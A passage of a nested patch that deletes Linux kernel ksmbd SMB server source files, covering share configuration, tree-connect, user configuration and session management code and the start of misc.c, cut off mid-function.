+-struct ksmbd_share_config {
+-	char			*name;
+-	char			*path;
+-
+-	unsigned int		path_sz;
+-	unsigned int		flags;
+-	struct list_head	veto_list;
+-
+-	struct path		vfs_path;
+-
+-	atomic_t		refcount;
+-	struct hlist_node	hlist;
+-	unsigned short		create_mask;
+-	unsigned short		directory_mask;
+-	unsigned short		force_create_mode;
+-	unsigned short		force_directory_mode;
+-	unsigned short		force_uid;
+-	unsigned short		force_gid;
+-};
+-
+-#define KSMBD_SHARE_INVALID_UID	((__u16)-1)
+-#define KSMBD_SHARE_INVALID_GID	((__u16)-1)
+-
+-static inline int share_config_create_mode(struct ksmbd_share_config *share,
+-					   umode_t posix_mode)
+-{
+-	if (!share->force_create_mode) {
+-		if (!posix_mode)
+-			return share->create_mask;
+-		else
+-			return posix_mode & share->create_mask;
+-	}
+-	return share->force_create_mode & share->create_mask;
+-}
+-
+-static inline int share_config_directory_mode(struct ksmbd_share_config *share,
+-					      umode_t posix_mode)
+-{
+-	if (!share->force_directory_mode) {
+-		if (!posix_mode)
+-			return share->directory_mask;
+-		else
+-			return posix_mode & share->directory_mask;
+-	}
+-
+-	return share->force_directory_mode & share->directory_mask;
+-}
+-
+-static inline int test_share_config_flag(struct ksmbd_share_config *share,
+-					 int flag)
+-{
+-	return share->flags & flag;
+-}
+-
+-void ksmbd_share_config_del(struct ksmbd_share_config *share);
+-void __ksmbd_share_config_put(struct ksmbd_share_config *share);
+-
+-static inline void ksmbd_share_config_put(struct ksmbd_share_config *share)
+-{
+-	if (!atomic_dec_and_test(&share->refcount))
+-		return;
+-	__ksmbd_share_config_put(share);
+-}
+-
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
+-						  const char *name);
+-bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
+-			       const char *filename);
+-#endif /* __SHARE_CONFIG_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+deleted file mode 100644
+index f07a05f376513..0000000000000
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ /dev/null
+@@ -1,147 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/slab.h>
+-#include <linux/xarray.h>
+-
+-#include "../transport_ipc.h"
+-#include "../connection.h"
+-
+-#include "tree_connect.h"
+-#include "user_config.h"
+-#include "share_config.h"
+-#include "user_session.h"
+-
+-struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name)
+-{
+-	struct ksmbd_tree_conn_status status = {-ENOENT, NULL};
+-	struct ksmbd_tree_connect_response *resp = NULL;
+-	struct ksmbd_share_config *sc;
+-	struct ksmbd_tree_connect *tree_conn = NULL;
+-	struct sockaddr *peer_addr;
+-	int ret;
+-
+-	sc = ksmbd_share_config_get(conn->um, share_name);
+-	if (!sc)
+-		return status;
+-
+-	tree_conn = kzalloc(sizeof(struct ksmbd_tree_connect), GFP_KERNEL);
+-	if (!tree_conn) {
+-		status.ret = -ENOMEM;
+-		goto out_error;
+-	}
+-
+-	tree_conn->id = ksmbd_acquire_tree_conn_id(sess);
+-	if (tree_conn->id < 0) {
+-		status.ret = -EINVAL;
+-		goto out_error;
+-	}
+-
+-	peer_addr = KSMBD_TCP_PEER_SOCKADDR(conn);
+-	resp = ksmbd_ipc_tree_connect_request(sess,
+-					      sc,
+-					      tree_conn,
+-					      peer_addr);
+-	if (!resp) {
+-		status.ret = -EINVAL;
+-		goto out_error;
+-	}
+-
+-	status.ret = resp->status;
+-	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
+-		goto out_error;
+-
+-	tree_conn->flags = resp->connection_flags;
+-	if (test_tree_conn_flag(tree_conn, KSMBD_TREE_CONN_FLAG_UPDATE)) {
+-		struct ksmbd_share_config *new_sc;
+-
+-		ksmbd_share_config_del(sc);
+-		new_sc = ksmbd_share_config_get(conn->um, share_name);
+-		if (!new_sc) {
+-			pr_err("Failed to update stale share config\n");
+-			status.ret = -ESTALE;
+-			goto out_error;
+-		}
+-		ksmbd_share_config_put(sc);
+-		sc = new_sc;
+-	}
+-
+-	tree_conn->user = sess->user;
+-	tree_conn->share_conf = sc;
+-	status.tree_conn = tree_conn;
+-
+-	ret = xa_err(xa_store(&sess->tree_conns, tree_conn->id, tree_conn,
+-			      GFP_KERNEL));
+-	if (ret) {
+-		status.ret = -ENOMEM;
+-		goto out_error;
+-	}
+-	kvfree(resp);
+-	return status;
+-
+-out_error:
+-	if (tree_conn)
+-		ksmbd_release_tree_conn_id(sess, tree_conn->id);
+-	ksmbd_share_config_put(sc);
+-	kfree(tree_conn);
+-	kvfree(resp);
+-	return status;
+-}
+-
+-int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+-			       struct ksmbd_tree_connect *tree_conn)
+-{
+-	int ret;
+-
+-	ret = ksmbd_ipc_tree_disconnect_request(sess->id, tree_conn->id);
+-	ksmbd_release_tree_conn_id(sess, tree_conn->id);
+-	xa_erase(&sess->tree_conns, tree_conn->id);
+-	ksmbd_share_config_put(tree_conn->share_conf);
+-	kfree(tree_conn);
+-	return ret;
+-}
+-
+-struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+-						  unsigned int id)
+-{
+-	struct ksmbd_tree_connect *tcon;
+-
+-	tcon = xa_load(&sess->tree_conns, id);
+-	if (tcon) {
+-		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
+-			tcon = NULL;
+-	}
+-
+-	return tcon;
+-}
+-
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id)
+-{
+-	struct ksmbd_tree_connect *tc;
+-
+-	tc = ksmbd_tree_conn_lookup(sess, id);
+-	if (tc)
+-		return tc->share_conf;
+-	return NULL;
+-}
+-
+-int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+-{
+-	int ret = 0;
+-	struct ksmbd_tree_connect *tc;
+-	unsigned long id;
+-
+-	if (!sess)
+-		return -EINVAL;
+-
+-	xa_for_each(&sess->tree_conns, id, tc)
+-		ret |= ksmbd_tree_conn_disconnect(sess, tc);
+-	xa_destroy(&sess->tree_conns);
+-	return ret;
+-}
+diff --git a/fs/ksmbd/mgmt/tree_connect.h b/fs/ksmbd/mgmt/tree_connect.h
+deleted file mode 100644
+index 700df36cf3e30..0000000000000
+--- a/fs/ksmbd/mgmt/tree_connect.h
++++ /dev/null
+@@ -1,61 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __TREE_CONNECT_MANAGEMENT_H__
+-#define __TREE_CONNECT_MANAGEMENT_H__
+-
+-#include <linux/hashtable.h>
+-
+-#include "../ksmbd_netlink.h"
+-
+-struct ksmbd_share_config;
+-struct ksmbd_user;
+-struct ksmbd_conn;
+-
+-#define TREE_CONN_EXPIRE		1
+-
+-struct ksmbd_tree_connect {
+-	int				id;
+-
+-	unsigned int			flags;
+-	struct ksmbd_share_config	*share_conf;
+-	struct ksmbd_user		*user;
+-
+-	struct list_head		list;
+-
+-	int				maximal_access;
+-	bool				posix_extensions;
+-	unsigned long			status;
+-};
+-
+-struct ksmbd_tree_conn_status {
+-	unsigned int			ret;
+-	struct ksmbd_tree_connect	*tree_conn;
+-};
+-
+-static inline int test_tree_conn_flag(struct ksmbd_tree_connect *tree_conn,
+-				      int flag)
+-{
+-	return tree_conn->flags & flag;
+-}
+-
+-struct ksmbd_session;
+-
+-struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name);
+-
+-int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+-			       struct ksmbd_tree_connect *tree_conn);
+-
+-struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+-						  unsigned int id);
+-
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id);
+-
+-int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess);
+-
+-#endif /* __TREE_CONNECT_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/user_config.c b/fs/ksmbd/mgmt/user_config.c
+deleted file mode 100644
+index 279d00feff216..0000000000000
+--- a/fs/ksmbd/mgmt/user_config.c
++++ /dev/null
+@@ -1,79 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/slab.h>
+-#include <linux/mm.h>
+-
+-#include "user_config.h"
+-#include "../transport_ipc.h"
+-
+-struct ksmbd_user *ksmbd_login_user(const char *account)
+-{
+-	struct ksmbd_login_response *resp;
+-	struct ksmbd_user *user = NULL;
+-
+-	resp = ksmbd_ipc_login_request(account);
+-	if (!resp)
+-		return NULL;
+-
+-	if (!(resp->status & KSMBD_USER_FLAG_OK))
+-		goto out;
+-
+-	user = ksmbd_alloc_user(resp);
+-out:
+-	kvfree(resp);
+-	return user;
+-}
+-
+-struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp)
+-{
+-	struct ksmbd_user *user = NULL;
+-
+-	user = kmalloc(sizeof(struct ksmbd_user), GFP_KERNEL);
+-	if (!user)
+-		return NULL;
+-
+-	user->name = kstrdup(resp->account, GFP_KERNEL);
+-	user->flags = resp->status;
+-	user->gid = resp->gid;
+-	user->uid = resp->uid;
+-	user->passkey_sz = resp->hash_sz;
+-	user->passkey = kmalloc(resp->hash_sz, GFP_KERNEL);
+-	if (user->passkey)
+-		memcpy(user->passkey, resp->hash, resp->hash_sz);
+-
+-	if (!user->name || !user->passkey) {
+-		kfree(user->name);
+-		kfree(user->passkey);
+-		kfree(user);
+-		user = NULL;
+-	}
+-	return user;
+-}
+-
+-void ksmbd_free_user(struct ksmbd_user *user)
+-{
+-	ksmbd_ipc_logout_request(user->name, user->flags);
+-	kfree(user->name);
+-	kfree(user->passkey);
+-	kfree(user);
+-}
+-
+-int ksmbd_anonymous_user(struct ksmbd_user *user)
+-{
+-	if (user->name[0] == '\0')
+-		return 1;
+-	return 0;
+-}
+-
+-bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2)
+-{
+-	if (strcmp(u1->name, u2->name))
+-		return false;
+-	if (memcmp(u1->passkey, u2->passkey, u1->passkey_sz))
+-		return false;
+-
+-	return true;
+-}
+diff --git a/fs/ksmbd/mgmt/user_config.h b/fs/ksmbd/mgmt/user_config.h
+deleted file mode 100644
+index 6a44109617f14..0000000000000
+--- a/fs/ksmbd/mgmt/user_config.h
++++ /dev/null
+@@ -1,68 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __USER_CONFIG_MANAGEMENT_H__
+-#define __USER_CONFIG_MANAGEMENT_H__
+-
+-#include "../glob.h"
+-
+-struct ksmbd_user {
+-	unsigned short		flags;
+-
+-	unsigned int		uid;
+-	unsigned int		gid;
+-
+-	char			*name;
+-
+-	size_t			passkey_sz;
+-	char			*passkey;
+-	unsigned int		failed_login_count;
+-};
+-
+-static inline bool user_guest(struct ksmbd_user *user)
+-{
+-	return user->flags & KSMBD_USER_FLAG_GUEST_ACCOUNT;
+-}
+-
+-static inline void set_user_flag(struct ksmbd_user *user, int flag)
+-{
+-	user->flags |= flag;
+-}
+-
+-static inline int test_user_flag(struct ksmbd_user *user, int flag)
+-{
+-	return user->flags & flag;
+-}
+-
+-static inline void set_user_guest(struct ksmbd_user *user)
+-{
+-}
+-
+-static inline char *user_passkey(struct ksmbd_user *user)
+-{
+-	return user->passkey;
+-}
+-
+-static inline char *user_name(struct ksmbd_user *user)
+-{
+-	return user->name;
+-}
+-
+-static inline unsigned int user_uid(struct ksmbd_user *user)
+-{
+-	return user->uid;
+-}
+-
+-static inline unsigned int user_gid(struct ksmbd_user *user)
+-{
+-	return user->gid;
+-}
+-
+-struct ksmbd_user *ksmbd_login_user(const char *account);
+-struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp);
+-void ksmbd_free_user(struct ksmbd_user *user);
+-int ksmbd_anonymous_user(struct ksmbd_user *user);
+-bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2);
+-#endif /* __USER_CONFIG_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+deleted file mode 100644
+index ea4b56d570fbb..0000000000000
+--- a/fs/ksmbd/mgmt/user_session.c
++++ /dev/null
+@@ -1,400 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/slab.h>
+-#include <linux/rwsem.h>
+-#include <linux/xarray.h>
+-
+-#include "ksmbd_ida.h"
+-#include "user_session.h"
+-#include "user_config.h"
+-#include "tree_connect.h"
+-#include "../transport_ipc.h"
+-#include "../connection.h"
+-#include "../vfs_cache.h"
+-
+-static DEFINE_IDA(session_ida);
+-
+-#define SESSION_HASH_BITS		3
+-static DEFINE_HASHTABLE(sessions_table, SESSION_HASH_BITS);
+-static DECLARE_RWSEM(sessions_table_lock);
+-
+-struct ksmbd_session_rpc {
+-	int			id;
+-	unsigned int		method;
+-	struct list_head	list;
+-};
+-
+-static void free_channel_list(struct ksmbd_session *sess)
+-{
+-	struct channel *chann;
+-	unsigned long index;
+-
+-	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
+-		xa_erase(&sess->ksmbd_chann_list, index);
+-		kfree(chann);
+-	}
+-
+-	xa_destroy(&sess->ksmbd_chann_list);
+-}
+-
+-static void __session_rpc_close(struct ksmbd_session *sess,
+-				struct ksmbd_session_rpc *entry)
+-{
+-	struct ksmbd_rpc_command *resp;
+-
+-	resp = ksmbd_rpc_close(sess, entry->id);
+-	if (!resp)
+-		pr_err("Unable to close RPC pipe %d\n", entry->id);
+-
+-	kvfree(resp);
+-	ksmbd_rpc_id_free(entry->id);
+-	kfree(entry);
+-}
+-
+-static void ksmbd_session_rpc_clear_list(struct ksmbd_session *sess)
+-{
+-	struct ksmbd_session_rpc *entry;
+-
+-	while (!list_empty(&sess->rpc_handle_list)) {
+-		entry = list_entry(sess->rpc_handle_list.next,
+-				   struct ksmbd_session_rpc,
+-				   list);
+-
+-		list_del(&entry->list);
+-		__session_rpc_close(sess, entry);
+-	}
+-}
+-
+-static int __rpc_method(char *rpc_name)
+-{
+-	if (!strcmp(rpc_name, "\\srvsvc") || !strcmp(rpc_name, "srvsvc"))
+-		return KSMBD_RPC_SRVSVC_METHOD_INVOKE;
+-
+-	if (!strcmp(rpc_name, "\\wkssvc") || !strcmp(rpc_name, "wkssvc"))
+-		return KSMBD_RPC_WKSSVC_METHOD_INVOKE;
+-
+-	if (!strcmp(rpc_name, "LANMAN") || !strcmp(rpc_name, "lanman"))
+-		return KSMBD_RPC_RAP_METHOD;
+-
+-	if (!strcmp(rpc_name, "\\samr") || !strcmp(rpc_name, "samr"))
+-		return KSMBD_RPC_SAMR_METHOD_INVOKE;
+-
+-	if (!strcmp(rpc_name, "\\lsarpc") || !strcmp(rpc_name, "lsarpc"))
+-		return KSMBD_RPC_LSARPC_METHOD_INVOKE;
+-
+-	pr_err("Unsupported RPC: %s\n", rpc_name);
+-	return 0;
+-}
+-
+-int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+-{
+-	struct ksmbd_session_rpc *entry;
+-	struct ksmbd_rpc_command *resp;
+-	int method;
+-
+-	method = __rpc_method(rpc_name);
+-	if (!method)
+-		return -EINVAL;
+-
+-	entry = kzalloc(sizeof(struct ksmbd_session_rpc), GFP_KERNEL);
+-	if (!entry)
+-		return -EINVAL;
+-
+-	list_add(&entry->list, &sess->rpc_handle_list);
+-	entry->method = method;
+-	entry->id = ksmbd_ipc_id_alloc();
+-	if (entry->id < 0)
+-		goto free_entry;
+-
+-	resp = ksmbd_rpc_open(sess, entry->id);
+-	if (!resp)
+-		goto free_id;
+-
+-	kvfree(resp);
+-	return entry->id;
+-free_id:
+-	ksmbd_rpc_id_free(entry->id);
+-free_entry:
+-	list_del(&entry->list);
+-	kfree(entry);
+-	return -EINVAL;
+-}
+-
+-void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id)
+-{
+-	struct ksmbd_session_rpc *entry;
+-
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id) {
+-			list_del(&entry->list);
+-			__session_rpc_close(sess, entry);
+-			break;
+-		}
+-	}
+-}
+-
+-int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id)
+-{
+-	struct ksmbd_session_rpc *entry;
+-
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id)
+-			return entry->method;
+-	}
+-	return 0;
+-}
+-
+-void ksmbd_session_destroy(struct ksmbd_session *sess)
+-{
+-	if (!sess)
+-		return;
+-
+-	if (sess->user)
+-		ksmbd_free_user(sess->user);
+-
+-	ksmbd_tree_conn_session_logoff(sess);
+-	ksmbd_destroy_file_table(&sess->file_table);
+-	ksmbd_session_rpc_clear_list(sess);
+-	free_channel_list(sess);
+-	kfree(sess->Preauth_HashValue);
+-	ksmbd_release_id(&session_ida, sess->id);
+-	kfree(sess);
+-}
+-
+-static struct ksmbd_session *__session_lookup(unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	hash_for_each_possible(sessions_table, sess, hlist, id) {
+-		if (id == sess->id) {
+-			sess->last_active = jiffies;
+-			return sess;
+-		}
+-	}
+-	return NULL;
+-}
+-
+-static void ksmbd_expire_session(struct ksmbd_conn *conn)
+-{
+-	unsigned long id;
+-	struct ksmbd_session *sess;
+-
+-	down_write(&sessions_table_lock);
+-	xa_for_each(&conn->sessions, id, sess) {
+-		if (sess->state != SMB2_SESSION_VALID ||
+-		    time_after(jiffies,
+-			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
+-			xa_erase(&conn->sessions, sess->id);
+-			hash_del(&sess->hlist);
+-			ksmbd_session_destroy(sess);
+-			continue;
+-		}
+-	}
+-	up_write(&sessions_table_lock);
+-}
+-
+-int ksmbd_session_register(struct ksmbd_conn *conn,
+-			   struct ksmbd_session *sess)
+-{
+-	sess->dialect = conn->dialect;
+-	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
+-	ksmbd_expire_session(conn);
+-	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
+-}
+-
+-static int ksmbd_chann_del(struct ksmbd_conn *conn, struct ksmbd_session *sess)
+-{
+-	struct channel *chann;
+-
+-	chann = xa_erase(&sess->ksmbd_chann_list, (long)conn);
+-	if (!chann)
+-		return -ENOENT;
+-
+-	kfree(chann);
+-	return 0;
+-}
+-
+-void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
+-{
+-	struct ksmbd_session *sess;
+-	unsigned long id;
+-
+-	down_write(&sessions_table_lock);
+-	if (conn->binding) {
+-		int bkt;
+-		struct hlist_node *tmp;
+-
+-		hash_for_each_safe(sessions_table, bkt, tmp, sess, hlist) {
+-			if (!ksmbd_chann_del(conn, sess) &&
+-			    xa_empty(&sess->ksmbd_chann_list)) {
+-				hash_del(&sess->hlist);
+-				ksmbd_session_destroy(sess);
+-			}
+-		}
+-	}
+-
+-	xa_for_each(&conn->sessions, id, sess) {
+-		unsigned long chann_id;
+-		struct channel *chann;
+-
+-		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
+-			if (chann->conn != conn)
+-				ksmbd_conn_set_exiting(chann->conn);
+-		}
+-
+-		ksmbd_chann_del(conn, sess);
+-		if (xa_empty(&sess->ksmbd_chann_list)) {
+-			xa_erase(&conn->sessions, sess->id);
+-			hash_del(&sess->hlist);
+-			ksmbd_session_destroy(sess);
+-		}
+-	}
+-	up_write(&sessions_table_lock);
+-}
+-
+-struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+-					   unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	sess = xa_load(&conn->sessions, id);
+-	if (sess)
+-		sess->last_active = jiffies;
+-	return sess;
+-}
+-
+-struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	down_read(&sessions_table_lock);
+-	sess = __session_lookup(id);
+-	if (sess)
+-		sess->last_active = jiffies;
+-	up_read(&sessions_table_lock);
+-
+-	return sess;
+-}
+-
+-struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
+-					       unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	sess = ksmbd_session_lookup(conn, id);
+-	if (!sess && conn->binding)
+-		sess = ksmbd_session_lookup_slowpath(id);
+-	if (sess && sess->state != SMB2_SESSION_VALID)
+-		sess = NULL;
+-	return sess;
+-}
+-
+-struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
+-						    u64 sess_id)
+-{
+-	struct preauth_session *sess;
+-
+-	sess = kmalloc(sizeof(struct preauth_session), GFP_KERNEL);
+-	if (!sess)
+-		return NULL;
+-
+-	sess->id = sess_id;
+-	memcpy(sess->Preauth_HashValue, conn->preauth_info->Preauth_HashValue,
+-	       PREAUTH_HASHVALUE_SIZE);
+-	list_add(&sess->preauth_entry, &conn->preauth_sess_table);
+-
+-	return sess;
+-}
+-
+-static bool ksmbd_preauth_session_id_match(struct preauth_session *sess,
+-					   unsigned long long id)
+-{
+-	return sess->id == id;
+-}
+-
+-struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
+-						     unsigned long long id)
+-{
+-	struct preauth_session *sess = NULL;
+-
+-	list_for_each_entry(sess, &conn->preauth_sess_table, preauth_entry) {
+-		if (ksmbd_preauth_session_id_match(sess, id))
+-			return sess;
+-	}
+-	return NULL;
+-}
+-
+-static int __init_smb2_session(struct ksmbd_session *sess)
+-{
+-	int id = ksmbd_acquire_smb2_uid(&session_ida);
+-
+-	if (id < 0)
+-		return -EINVAL;
+-	sess->id = id;
+-	return 0;
+-}
+-
+-static struct ksmbd_session *__session_create(int protocol)
+-{
+-	struct ksmbd_session *sess;
+-	int ret;
+-
+-	if (protocol != CIFDS_SESSION_FLAG_SMB2)
+-		return NULL;
+-
+-	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
+-	if (!sess)
+-		return NULL;
+-
+-	if (ksmbd_init_file_table(&sess->file_table))
+-		goto error;
+-
+-	sess->last_active = jiffies;
+-	sess->state = SMB2_SESSION_IN_PROGRESS;
+-	set_session_flag(sess, protocol);
+-	xa_init(&sess->tree_conns);
+-	xa_init(&sess->ksmbd_chann_list);
+-	INIT_LIST_HEAD(&sess->rpc_handle_list);
+-	sess->sequence_number = 1;
+-
+-	ret = __init_smb2_session(sess);
+-	if (ret)
+-		goto error;
+-
+-	ida_init(&sess->tree_conn_ida);
+-
+-	down_write(&sessions_table_lock);
+-	hash_add(sessions_table, &sess->hlist, sess->id);
+-	up_write(&sessions_table_lock);
+-
+-	return sess;
+-
+-error:
+-	ksmbd_session_destroy(sess);
+-	return NULL;
+-}
+-
+-struct ksmbd_session *ksmbd_smb2_session_create(void)
+-{
+-	return __session_create(CIFDS_SESSION_FLAG_SMB2);
+-}
+-
+-int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess)
+-{
+-	int id = -EINVAL;
+-
+-	if (test_session_flag(sess, CIFDS_SESSION_FLAG_SMB2))
+-		id = ksmbd_acquire_smb2_tid(&sess->tree_conn_ida);
+-
+-	return id;
+-}
+-
+-void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id)
+-{
+-	if (id >= 0)
+-		ksmbd_release_id(&sess->tree_conn_ida, id);
+-}
+diff --git a/fs/ksmbd/mgmt/user_session.h b/fs/ksmbd/mgmt/user_session.h
+deleted file mode 100644
+index 51f38e5b61abb..0000000000000
+--- a/fs/ksmbd/mgmt/user_session.h
++++ /dev/null
+@@ -1,103 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __USER_SESSION_MANAGEMENT_H__
+-#define __USER_SESSION_MANAGEMENT_H__
+-
+-#include <linux/hashtable.h>
+-#include <linux/xarray.h>
+-
+-#include "../smb_common.h"
+-#include "../ntlmssp.h"
+-
+-#define CIFDS_SESSION_FLAG_SMB2		BIT(1)
+-
+-#define PREAUTH_HASHVALUE_SIZE		64
+-
+-struct ksmbd_file_table;
+-
+-struct channel {
+-	__u8			smb3signingkey[SMB3_SIGN_KEY_SIZE];
+-	struct ksmbd_conn	*conn;
+-};
+-
+-struct preauth_session {
+-	__u8			Preauth_HashValue[PREAUTH_HASHVALUE_SIZE];
+-	u64			id;
+-	struct list_head	preauth_entry;
+-};
+-
+-struct ksmbd_session {
+-	u64				id;
+-
+-	__u16				dialect;
+-	char				ClientGUID[SMB2_CLIENT_GUID_SIZE];
+-
+-	struct ksmbd_user		*user;
+-	unsigned int			sequence_number;
+-	unsigned int			flags;
+-
+-	bool				sign;
+-	bool				enc;
+-	bool				is_anonymous;
+-
+-	int				state;
+-	__u8				*Preauth_HashValue;
+-
+-	char				sess_key[CIFS_KEY_SIZE];
+-
+-	struct hlist_node		hlist;
+-	struct xarray			ksmbd_chann_list;
+-	struct xarray			tree_conns;
+-	struct ida			tree_conn_ida;
+-	struct list_head		rpc_handle_list;
+-
+-	__u8				smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8				smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8				smb3signingkey[SMB3_SIGN_KEY_SIZE];
+-
+-	struct ksmbd_file_table		file_table;
+-	unsigned long			last_active;
+-};
+-
+-static inline int test_session_flag(struct ksmbd_session *sess, int bit)
+-{
+-	return sess->flags & bit;
+-}
+-
+-static inline void set_session_flag(struct ksmbd_session *sess, int bit)
+-{
+-	sess->flags |= bit;
+-}
+-
+-static inline void clear_session_flag(struct ksmbd_session *sess, int bit)
+-{
+-	sess->flags &= ~bit;
+-}
+-
+-struct ksmbd_session *ksmbd_smb2_session_create(void);
+-
+-void ksmbd_session_destroy(struct ksmbd_session *sess);
+-
+-struct ksmbd_session *ksmbd_session_lookup_slowpath(unsigned long long id);
+-struct ksmbd_session *ksmbd_session_lookup(struct ksmbd_conn *conn,
+-					   unsigned long long id);
+-int ksmbd_session_register(struct ksmbd_conn *conn,
+-			   struct ksmbd_session *sess);
+-void ksmbd_sessions_deregister(struct ksmbd_conn *conn);
+-struct ksmbd_session *ksmbd_session_lookup_all(struct ksmbd_conn *conn,
+-					       unsigned long long id);
+-struct preauth_session *ksmbd_preauth_session_alloc(struct ksmbd_conn *conn,
+-						    u64 sess_id);
+-struct preauth_session *ksmbd_preauth_session_lookup(struct ksmbd_conn *conn,
+-						     unsigned long long id);
+-
+-int ksmbd_acquire_tree_conn_id(struct ksmbd_session *sess);
+-void ksmbd_release_tree_conn_id(struct ksmbd_session *sess, int id);
+-
+-int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name);
+-void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id);
+-int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id);
+-#endif /* __USER_SESSION_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/misc.c b/fs/ksmbd/misc.c
+deleted file mode 100644
+index 9e8afaa686e3a..0000000000000
+--- a/fs/ksmbd/misc.c
++++ /dev/null
+@@ -1,381 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/xattr.h>
+-#include <linux/fs.h>
+-#include <linux/unicode.h>
+-
+-#include "misc.h"
+-#include "smb_common.h"
+-#include "connection.h"
+-#include "vfs.h"
+-
+-#include "mgmt/share_config.h"
+-
+-/**
+- * match_pattern() - compare a string with a pattern which might include
+- * wildcard '*' and '?'
+- * TODO : implement consideration about DOS_DOT, DOS_QM and DOS_STAR
+- *
+- * @str:	string to compare with a pattern
+- * @len:	string length
+- * @pattern:	pattern string which might include wildcard '*' and '?'
+- *
+- * Return:	0 if pattern matched with the string, otherwise non zero value
+- */
+-int match_pattern(const char *str, size_t len, const char *pattern)
+-{
+-	const char *s = str;
+-	const char *p = pattern;
+-	bool star = false;
+-
+-	while (*s && len) {
+-		switch (*p) {
+-		case '?':
+-			s++;
+-			len--;
+-			p++;
+-			break;
+-		case '*':
+-			star = true;
+-			str = s;
+-			if (!*++p)
+-				return true;
+-			pattern = p;
+-			break;
+-		default:
+-			if (tolower(*s) == tolower(*p)) {
+-				s++;
+-				len--;
+-				p++;
+-			} else {
+-				if (!star)
+-					return false;
+-				str++;
+-				s = str;
+-				p = pattern;
+-			}
+-			break;
+-		}
+-	}
+-
+-	if (*p == '*')
+-		++p;
+-	return !*p;
+-}
+-
+-/*
+- * is_char_allowed() - check for valid character
+- * @ch:		input character to be checked
+- *
+- * Return:	1 if char is allowed, otherwise 0
+- */
+-static inline int is_char_allowed(char ch)
+-{
+-	/* check for control chars, wildcards etc. */
+-	if (!(ch & 0x80) &&
+-	    (ch <= 0x1f ||
